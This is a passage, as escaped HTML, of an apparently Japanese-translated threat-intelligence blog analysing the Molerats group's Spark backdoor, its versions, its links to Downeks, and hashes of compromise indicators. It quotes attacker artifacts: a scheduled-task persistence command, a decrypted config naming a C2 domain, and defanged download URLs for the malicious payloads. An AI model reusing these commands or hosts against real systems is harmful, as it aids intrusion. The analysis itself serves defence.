c\u6210\u3057\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">schtasks \/create \/f \/sc minute \/mo 1 \/tn ihelp \/tr %temp%\\ihelp.exe<\/span><\/p>\n<p>2019\u5e741\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u3044\u304f\u3064\u304b\u306e\u6ce8\u76ee\u306b\u5024\u3059\u308b\u7279\u5fb4\u3068\u3057\u3066\u306f\u3001\u4ed6\u306e\u65e2\u77e5\u306e\u30b5\u30f3\u30d7\u30eb\u304b\u3089\u81ea\u7531\u306b\u4f7f\u7528\u3067\u304d\u308b\u3055\u307e\u3056\u307e\u306a\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u304c\u6319\u3052\u3089\u308c\u307e\u3059\u3002JSON\u306e\u4ee3\u308f\u308a\u306b<a href=\"https:\/\/github.com\/msgpack\/msgpack-c\">msgpackv1<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3068C2\u901a\u4fe1\u3092\u69cb\u7bc9\u3057\u305f\u308a\u3001cURL\u306e\u4ee3\u308f\u308a\u306b<a href=\"https:\/\/github.com\/SFML\">SFML<\/a>\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u306a\u3069\u3067\u3059\u3002\u307e\u305f\u30012019\u5e7411\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u306f\u7570\u306a\u308a\u3001\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001AES\u6697\u53f7\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306e\u69cb\u6210\u304a\u3088\u3073\u4ed6\u306e\u95a2\u9023\u6587\u5b57\u5217\u3092\u5fa9\u53f7\u3057\u305f\u308a\u3001\u305d\u306eC2\u3068\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u901a\u4fe1\u3092\u6697\u53f7\u5316\u304a\u3088\u3073\u5fa9\u53f7\u3057\u307e\u3059\u3002\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\u3088\u3046\u306b\u30ad\u30fc\u3068\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3057\u3066\u30ab\u30b9\u30bf\u30e0\u306erolling XOR\u6697\u53f7\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u306a\u304f\u3001\u63d0\u4f9b\u3055\u308c\u305f\u30ad\u30fc\u6587\u5b57\u5217\u306eSHA256\u30cf\u30c3\u30b7\u30e5\u5168\u4f53\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002msgpack\u3092\u4f7f\u7528\u3057\u3066\u69cb\u9020\u5316\u3055\u308c\u305f\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u304b\u3089\u5fa9\u53f7\u3055\u308c\u305f\u69cb\u6210\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">\\x88\\xa4jevG\\xadsmartweb9[.]com\\xa3JRk\\xa1\/\\xa3ufRP\\xa4qNxp\\x00\\xa4kfds\\xa0\\xa4WjaS\\x01\\xa3WnF\\xb8OMfX5GiCmOICUvhunB2lWQ==\\xa3sRF\\xcd'\\x10<\/span><\/p>\n<p>\u307e\u305f\u30012020\u5e74\u306eSpark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3(SHA256:8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8)\u306e\u914d\u4fe1\u6587\u66f8\u3092\u89e3\u6790\u3057\u305f\u3068\u3053\u308d\u3001\u305d\u308c\u306f2019\u5e74\u306e1\u6708\u306810\u6708\u306e\u3069\u3061\u3089\u306e\u914d\u4fe1\u6587\u66f8\u3068\u3082\u7570\u306a\u308a\u307e\u3057\u305f\u3002\u307e\u305a\u3001\u6700\u521d\u306e\u914d\u4fe1\u6587\u66f8\u306f\u3001\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u304a\u3089\u305a\u3001Google\u30c9\u30e9\u30a4\u30d6\u3001\u5177\u4f53\u7684\u306b\u306f\u4ee5\u4e0b\u306eURL\u304b\u3089\u306e\u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u306e\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/drive.google.com\/uc?export=download&amp;d=1NbCEnL-jA89PWBEhLWwHmBM5nmUKNRS8<\/span><\/p>\n<p>\u30ea\u30e2\u30fc\u30c8 \u30c6\u30f3\u30d7\u30ec\u30fc\u30c8(SHA256:a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367)\u306b\u306f\u3001\u4ee5\u4e0b\u306eURL\u304b\u3089\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3092\u8a66\u307f\u308b\u30de\u30af\u30ed\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\">hxxs:\/\/drive.google.com\/uc?export=download&amp;id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH<\/span><\/p>\n<p>Google\u30c9\u30e9\u30a4\u30d6 \u30ea\u30f3\u30af(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128)\u3067\u30db\u30b9\u30c8\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u3042\u308a\u3001%userprofile%\\runawy.exe\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3092\u8a66\u307f\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u3053\u306e\u30d6\u30ed\u30b0\u3067\u524d\u8ff0\u3057\u305f\"attachment.doc\"\u914d\u4fe1\u6587\u66f8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u3053\u3068\u304c\u89b3\u6e2c\u3055\u308c\u305f\u3082\u306e\u3068\u307e\u3063\u305f\u304f\u540c\u3058\u30c9\u30ed\u30c3\u30d1\u304a\u3088\u3073\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3059\u3002<\/p>\n<p>\u88686\u306f\u3001\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u8aac\u660e\u3057\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u6a5f\u80fd\u306e\u6bd4\u8f03\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u6b8b\u5ff5\u306a\u304c\u3089\u3001\u79c1\u305f\u3061\u306f\u30012019\u5e7410\u6708\u306e\u653b\u6483\u3067\u914d\u5e03\u3055\u308c\u305fMOFA\u95a2\u9023\u306eWord\u6587\u66f8\u306b\u3088\u3063\u3066\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u53d6\u5f97\u3067\u304d\u307e\u305b\u3093\u3067\u3057\u305f\u30022019\u5e741\u6708\u30682020\u5e74\u306e\u914d\u4fe1\u6587\u66f8\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30b5\u30f3\u30d7\u30eb\u3092\u30012019\u5e7411\u6708\u306ePictures.pdf\u914d\u4fe1\u6587\u66f8\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305fSpark\u30b5\u30f3\u30d7\u30eb\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304c\u7d99\u7d9a\u7684\u306b\u3053\u306e\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u958b\u767a\u3057\u3066\u3044\u308b\u3053\u3068\u3092\u793a\u5506\u3059\u308b\u6ce8\u76ee\u306b\u5024\u3059\u308b\u76f8\u9055\u304c\u8a8d\u3081\u3089\u308c\u307e\u3059\u3002<\/p>\n<table>\n<tbody>\n<tr>\n<td><strong>\u6a5f\u80fd<\/strong><\/td>\n<td><strong>2019\u5e741\u6708\u306eSpark<\/strong><\/td>\n<td><strong>2019\u5e7411\u6708\u306eSpark (Pictures.pdf)<\/strong><\/td>\n<td><strong>2019\u5e7410\u6708\u306811\u6708\u306e\"attachment.doc\"\u30682020\u5e741\u6708\u306e\"Spark\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\"<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u30c9\u30ed\u30c3\u30d1<\/td>\n<td>\u306a\u3057<\/td>\n<td>\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8<\/td>\n<td>\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305fAutoIt\u30b9\u30af\u30ea\u30d7\u30c8<\/td>\n<\/tr>\n<tr>\n<td>HTTP\u30e9\u30a4\u30d6\u30e9\u30ea<\/td>\n<td><a href=\"https:\/\/github.com\/SFML\">SFML<\/a><\/td>\n<td><a href=\"https:\/\/github.com\/curl\/curl\/releases\/tag\/curl-7_56_0\">cURL 7.56.0-DEV<\/a><\/td>\n<td><a href=\"https:\/\/github.com\/elnormous\/HTTPRequest\">elnormous' HTTPRequest<\/a><\/td>\n<\/tr>\n<tr>\n<td>\u69cb\u6210\u69cb\u9020<\/td>\n<td><a href=\"https:\/\/github.com\/msgpack\/msgpack-c\">msgpack\u30d0\u30fc\u30b8\u30e7\u30f31<\/a><\/td>\n<td><a href=\"https:\/\/github.com\/nlohmann\/json\/releases\/tag\/v2.1.1\">JSON for Modern C++ v2.1.1<\/a><\/td>\n<td><a href=\"https:\/\/github.com\/nlohmann\/json\/releases\/tag\/v3.7.0\">JSON for Modern C++ v3.7.0<\/a><\/td>\n<\/tr>\n<tr>\n<td>\u30da\u30a4\u30ed\u30fc\u30c9 \u30d1\u30c3\u30ab\u30fc<\/td>\n<td>Enigma Virtual Box<\/td>\n<td>Enigma (5.X)<\/td>\n<td>Enigma (5.X)<\/td>\n<\/tr>\n<tr>\n<td>\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u6697\u53f7<\/td>\n<td>\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308bAES<\/td>\n<td>\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308brolling XOR\u3068\u3001\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308b3DES<\/td>\n<td>\u30ad\u30fc\u304a\u3088\u3073\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u306b\u5bfe\u3059\u308brolling XOR\u3068\u300116\u30d0\u30a4\u30c8\u306e\u30c1\u30e3\u30f3\u30af\u306e\u6697\u53f7\u30c6\u30ad\u30b9\u30c8\u3092\u5fa9\u53f7\u3059\u308b\u30ab\u30b9\u30bf\u30e0AES<\/td>\n<\/tr>\n<tr>\n<td>\u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf<\/td>\n<td>\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9<\/td>\n<td>\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d\u3001\u30b7\u30b9\u30c6\u30e0\u60c5\u5831\u3092\u53ce\u96c6\u3059\u308b\u305f\u3081\u306e\u30b3\u30de\u30f3\u30c9<\/td>\n<td>\u69cb\u6210\u3001C2\u901a\u4fe1\u306e\u540d\u524d<\/td>\n<\/tr>\n<tr>\n<td>\u6c38\u7d9a\u5316<\/td>\n<td>\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af<\/td>\n<td>@StartupDir\u306eLNK\u306e\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8<\/td>\n<td>@StartupDir\u306e\u30b3\u30d4\u30fc\u3055\u308c\u305f\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3001\u30b9\u30b1\u30b8\u30e5\u30fc\u30eb\u3055\u308c\u305f\u30bf\u30b9\u30af<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span style=\"font-size: 10pt;\"><em>\u88686. 2019\u5e741\u6708\u30012019\u5e7410\u6708\u30012019\u5e7411\u6708\u30012020\u5e741\u6708\u306b\u914d\u5e03\u3055\u308c\u305fSpark\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u6bd4\u8f03<\/em><\/span><\/p>\n<h2><a id=\"post-105222-connection-to-downeks\"><\/a>Downeks\u3078\u306e\u63a5\u7d9a<\/h2>\n<p><a href=\"https:\/\/securelist.com\/gaza-cybergang-group1-operation-sneakypastes\/90068\/\">Kaspersky\u306e\u30ec\u30dd\u30fc\u30c8<\/a>\u306f\u3001Molerats\u306e\u30b5\u30d6\u30b0\u30eb\u30fc\u30d7(\u5225\u540dthe Gaza Cybergang)\u304c\u3001Spark\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u914d\u5e03\u3057\u305fOperation Parliament\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u884c\u3063\u3066\u3044\u308b\u3068\u8ff0\u3079\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306f\u3001\u3053\u306e\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u304cDustySky\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067<a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments\/\">Downeks\u3092\u914d\u5e03\u3057\u3066\u3044\u308b<\/a>\u3053\u3068\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u307e\u305f\u3001\u958b\u767a\u3068\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u306e\u9762\u3067\u306f\u3001Spark\u3068Downeks\u306b\u3044\u304f\u3064\u304b\u306e\u985e\u4f3c\u70b9\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002<\/p>\n<p>\u4f8b\u3048\u3070\u3001\u540c\u3058\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001\u304a\u3068\u308a\u6587\u66f8\u3092\u958b\u304f\u305f\u3081\u3068\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u308b\u60aa\u610f\u306e\u3042\u308b\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u3067\u3042\u308a\u30011\u3064\u306fDowneks\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3001\u4ed6\u306e2\u3064\u306fSpark\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u307e\u3059\u3002Downeks\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306f\u30012015\u5e7412\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u3066\u304a\u308a\u3001\u79c1\u305f\u3061\u306e<a href=\"https:\/\/unit42.paloaltonetworks.com\/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments\/\">\u30d6\u30ed\u30b0<\/a>\u3067\u8ff0\u3079\u305f\u3088\u3046\u306bDustySky\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u4f7f\u7528\u3055\u308c\u307e\u3057\u305f(SHA256: 75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9)\u3002\u307e\u305f\u3001\u79c1\u305f\u3061\u306f\u3001Spark\u30b5\u30f3\u30d7\u30eb\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u3053\u306e\u30d0\u30a4\u30f3\u30c0\u30fc \u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e\u30b5\u30f3\u30d7\u30eb\u30922\u3064\u6301\u3063\u3066\u3044\u307e\u3059\u30022017\u5e7411\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u3082\u306e(SHA256:4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85)\u30682018\u5e744\u6708\u306b\u30b3\u30f3\u30d1\u30a4\u30eb\u3055\u308c\u305f\u3082\u306e(SHA256:23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c)\u3067\u3059\u3002<\/p>\n<p>\u958b\u767a\u9762\u3067\u306f\u3001Downeks\u3068Spark\u306e\u3069\u3061\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3082\u3001GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a\u3044\u304f\u3064\u304b\u306e\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9 \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304a\u3088\u3073\u30b3\u30fc\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3001\u305d\u306eC2\u901a\u4fe1\u3092\u5b9f\u884c\u3057\u3001JSON\u5185\u306b\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u307e\u3059\u3002\u7b2c\u4e00\u306b\u3001Spark\u306fC2\u901a\u4fe1\u306bcURL\u30e9\u30a4\u30d6\u30e9\u30ea\u3001\u5177\u4f53\u7684\u306b\u306f\u3001\u30bd\u30fc\u30b9 \u30b3\u30fc\u30c9\u3092<a href=\"https:\/\/github.com\/curl\/curl\/releases\/tag\/curl-7_56_0\">GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a<\/a>\u30d0\u30fc\u30b8\u30e7\u30f37.56.0-DEV\u3092\u4f7f\u7528\u3057\u3001Downeks (SHA256:9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7)\u306fC2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u901a\u4fe1\u306bcURL\u3092\u4f7f\u7528\u3057\u307e\u3057\u305f\u304c\u3001\u305d\u308c\u306f\u3082\u3063\u3068\u53e4\u3044\u30d0\u30fc\u30b8\u30e7\u30f3(7.39.0)\u3067\u3057\u305f\u3002\u7b2c\u4e8c\u306b\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306fJSON\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3092\u89e3\u6790\u3057\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30e1\u30c3\u30bb\u30fc\u30b8\u3092\u69cb\u9020\u5316\u3057\u307e\u3059\u3002\u3053\u3053\u3067\u306f\u3001<a href=\"https:\/\/github.com\/nlohmann\/json\/releases\/tag\/v2.1.1\">GitHub\u3067\u5165\u624b\u53ef\u80fd\u306a<\/a>JSON for Modern C++ Version 2.1.1\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u524d\u306b\u5ef6\u3079\u305fDowneks\u3082\u3001JSON\u3092\u4f7f\u7528\u3057\u3066\u305d\u306e\u69cb\u6210\u3092\u89e3\u6790\u3057\u3001C2\u30b5\u30fc\u30d0\u30fc\u3068\u306e\u9593\u3067\u9001\u53d7\u4fe1\u3059\u308b\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u305f\u3060\u3057\u3001\u3053\u306e\u5834\u5408\u306f\u3001<a href=\"https:\/\/github.com\/Tencent\/rapidjson\">GitHub\u304b\u3089\u81ea\u7531\u306b\u5165\u624b\u53ef\u80fd\u306a<\/a>Tencent's RapidJSON\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001Spark\u306e\u958b\u767a\u8005\u304cSpark\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3054\u3068\u306b\u7570\u306a\u308bJSON\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u3001\u3068\u3044\u3046\u4ee5\u524d\u306e\u79c1\u305f\u3061\u306e\u89b3\u6e2c\u306b\u5408\u81f4\u3057\u307e\u3059\u3002<\/p>\n<h2><a id=\"post-105222-conclusion\"><\/a>\u7d50\u8ad6<\/h2>\n<p>Molerats\u306f\u3001Gaza Hacking Team\u3001Gaza Cybergang\u3068\u3082\u547c\u3070\u308c\u30012019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u306b\u304b\u3051\u3066\u3001\u653f\u5e9c\u3001\u901a\u4fe1\u4e8b\u696d\u8005\u3001\u4fdd\u967a\u304a\u3088\u3073\u5c0f\u58f2\u696d\u754c\u3068\u3044\u3063\u305f6\u30ab\u56fd\u306b\u304a\u3051\u308b8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u60aa\u610f\u306e\u3042\u308bWord\u304a\u3088\u3073PDF\u306e\u4e21\u65b9\u306e\u6587\u66f8\u3092\u914d\u5e03\u3057\u3001\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u306e\u8106\u5f31\u6027\u3092\u6d3b\u7528\u3059\u308b\u4ee3\u308f\u308a\u306b\u88ab\u5bb3\u8005\u304c\u611f\u67d3\u3059\u308b\u3088\u3046\u30bd\u30fc\u30b7\u30e3\u30eb \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3092\u8a66\u307f\u307e\u3059\u3002\u307e\u305f\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3001\u653b\u6483\u3067Spark\u30d0\u30c3\u30af\u30c9\u30a2\u3092\u4f7f\u7528\u3057\u307e\u3059\u304c\u3001\u91cd\u8981\u306a\u30c7\u30fc\u30bf\u3092\u69cb\u9020\u5316\u3057\u3066C2\u901a\u4fe1\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306b\u3001\u81ea\u7531\u306b\u5165\u624b\u53ef\u80fd\u306a\u3055\u307e\u3056\u307e\u306a\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3053\u306e\u30c4\u30fc\u30eb\u306e\u958b\u767a\u3092\u7d9a\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001\u4ee5\u4e0b\u306b\u3088\u3063\u3066\u3053\u306e\u30d6\u30ed\u30b0\u3067\u8aac\u660e\u3057\u305f\u653b\u6483\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>\u3059\u3079\u3066\u306e\u65e2\u77e5\u306eSpark\u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073\u914d\u4fe1\u6587\u66f8\u306f\u3001WildFire\u3067\u60aa\u610f\u304c\u3042\u308b\u3068\u5224\u5b9a\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>\u3059\u3079\u3066\u306e\u65e2\u77e5\u306eSpark C2\u30c9\u30e1\u30a4\u30f3\u304a\u3088\u3073\u914d\u5e03\u306b\u4f7f\u7528\u3055\u308c\u308b\u30c9\u30e1\u30a4\u30f3\u306f\u3001PANDB\u304a\u3088\u3073DNS\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3067\u60aa\u610f\u304c\u3042\u308b\u3068\u5206\u985e\u304a\u3088\u3073\u5224\u5b9a\u3055\u308c\u3066\u30de\u30fc\u30af\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>AutoFocus\u3092\u3054\u5229\u7528\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/autofocus.paloaltonetworks.com\/&quot; \\l &quot;\/tag\/Unit42.Molerats_Spark\">Molerats_Spark<\/a>\u30bf\u30b0\u3067\u914d\u4fe1\u6587\u66f8\u304a\u3088\u3073\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u8abf\u3079\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/li>\n<\/ul>\n<h2><a id=\"post-105222-appendix\"><\/a>\u4ed8\u9332<\/h2>\n<h3><a id=\"post-105222-indicators-of-compromise\"><\/a>IoC<\/h3>\n<h4><a id=\"post-105222-files-related-to-mofa-documents\"><\/a>MOFA\u6587\u66f8\u306b\u95a2\u9023\u3059\u308b\u30d5\u30a1\u30a4\u30eb<\/h4>\n<ul>\n<li>d19104ef4f443e80c21375f1b779f00c960e0193e8aade69d7ad87a11f39c897 \u2013 MOFA- 031019.doc<\/li>\n<li>dc3311b3a827840c25689c0e153f2c09ba9583bcf18cdc43b88b12cf9846e94b \u2013 Microsoft.vbs<\/li>\n<li>c45b5b01e1c3284fd694db6aa0ebeab8abe78d9bb12eb41b957cd121d97b3516 \u2013 PlayerVLC.vbs<\/li>\n<li>03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506 \u2013 MOFA- 061019.doc<\/li>\n<li>725d907b33cca8cec22f561068a3a8abf3616a8e2f452adb7fbd4aec20390f06 \u2013 Microsoft.vbs<\/li>\n<\/ul>\n<h4><a id=\"post-105222-files-related-to-attachment.doc\"><\/a>Attachment.doc\u306b\u95a2\u9023\u3059\u308b\u30d5\u30a1\u30a4\u30eb<\/h4>\n<ul>\n<li>eaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000 \u2013 attachment.doc<\/li>\n<li>7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 \u2013 rundll64.exe<\/li>\n<li>64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431 \u2013 runawy.exe<\/li>\n<\/ul>\n<h4><a id=\"post-105222-files-related-to-pictures.pdf\"><\/a>Pictures.pdf\u306b\u95a2\u9023\u3059\u308b\u30d5\u30a1\u30a4\u30eb<\/h4>\n<ul>\n<li>9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495 \u2013 Pictures.pdf<\/li>\n<li>1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da \u2013 Pictures.rar<\/li>\n<li>92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7 \u2013 \u0647\u0630\u0647 \u0639\u064a\u0646\u0629 \u0642\u0644\u064a\u0644\u0629 \u0645\u0646 \u0627\u0644\u0635\u0648\u0631.exe<\/li>\n<li>5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3 \u2013 pdf.exe<\/li>\n<\/ul>\n<h4><a id=\"post-105222-Xc049c51d953662bbd251722e18490800e736289\"><\/a>\u95a2\u9023\u3059\u308bSpark\u30da\u30a4\u30ed\u30fc\u30c9\u304a\u3088\u3073\u914d\u4fe1\u6587\u66f8<\/h4>\n<ul>\n<li>ee9f90819a578c8256fc950f62bd9f7b051edbee06618a26fa21c2875c3c301e \u2013 \u0627\u0644\u0645\u0630\u0643\u0631\u0629 \u0631\u0642\u0645 973 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u062d\u0643\u0648\u0645\u0629 \u0627\u0644\u062c (Note No. 973 Government List c)<\/li>\n<li>9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7 \u2013 GoogleChrome.vbs<\/li>\n<li>ddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8 \u2013 MOFA- 101019.doc<\/li>\n<li>4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba \u2013 Microsoft.vbs<\/li>\n<li>feec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21 \u2013<\/li>\n<li>bf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959 \u2013 \u0627\u0644\u062a\u0642\u0631\u064a\u0631 